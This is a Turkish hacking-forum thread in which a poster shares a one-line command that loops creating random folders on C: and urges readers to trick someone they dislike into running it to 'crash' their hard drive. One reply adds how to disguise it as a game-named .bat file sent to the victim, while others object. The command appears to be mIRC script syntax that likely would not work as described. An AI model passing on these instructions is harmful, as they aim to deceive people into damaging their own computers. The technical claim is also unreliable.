Tek Kodla Pc Sini çökert !!!!!!!

bulls

Katılımcı Üye
10 Ara 2006
341
7
ıÜüArkadaşlar bu vereceğim çok basit bir komut. Bu komutu sinir olduğunuz birisine BAŞLAT/ÇALIŞTIR 'a yazdırmanız gerekiyor. Nasıl yazdıracağınız ise sizin hayal gücünüze kalmış.Burada amaç hdd'i çökertmek. KENDİNİZ YAZMAYIN KURBANA YAZDIRIN.

/timersecure 0 0 //mkdir $mid(c:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)

 

GICIKX

Uzman üye
2 Ocak 2007
1,074
9
eline sağlıkta denenmez böyle bişey yazdıracağın adam tanıdıktır tanıdık birine de yapamazsın bunu yani ben yapamam
 

hakan2002

Katılımcı Üye
4 Ara 2006
255
4
mannheim
iyi emegine sagolda arkadasim adam salakmi bunlari yazacak hadi yaz dedim sonra bana demezmi nettin pc me diye
adami dövsem daha iyi karsimda nasil olsa
 

nosveraltu

Yeni üye
28 May 2007
6
0
bence çucuk yer interneti olmasını isteyen bilgisiz bir çocuk yer desekki senin internetin olcak desek alşunları yap desek herşeyi yapar internet için
 

caner_59_59

Yeni üye
27 Haz 2007
5
0
arkadaşımm interneti yoksa nasıl alcak ki bunu zaten yapma gözünü seweyim...
bu arada pay. için tşkr kardeş ama alıntı :S yazmamışın
 

DjErdem

Yeni üye
16 Eki 2006
1
0
Abiler en kolayi editörü acin yukaridaki kodu yazin farkli kaydete tiklayin bi isim verin kurbana yuturacak sekilde mesela counter_strike filan iste ondan sonra ismin son kisminada: .bat harflerini ekleyin is bitmistir artik sadece kurbana yolayin acincada arkadasimizin kodu devreye girecektir.

Greeetz Erdo
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.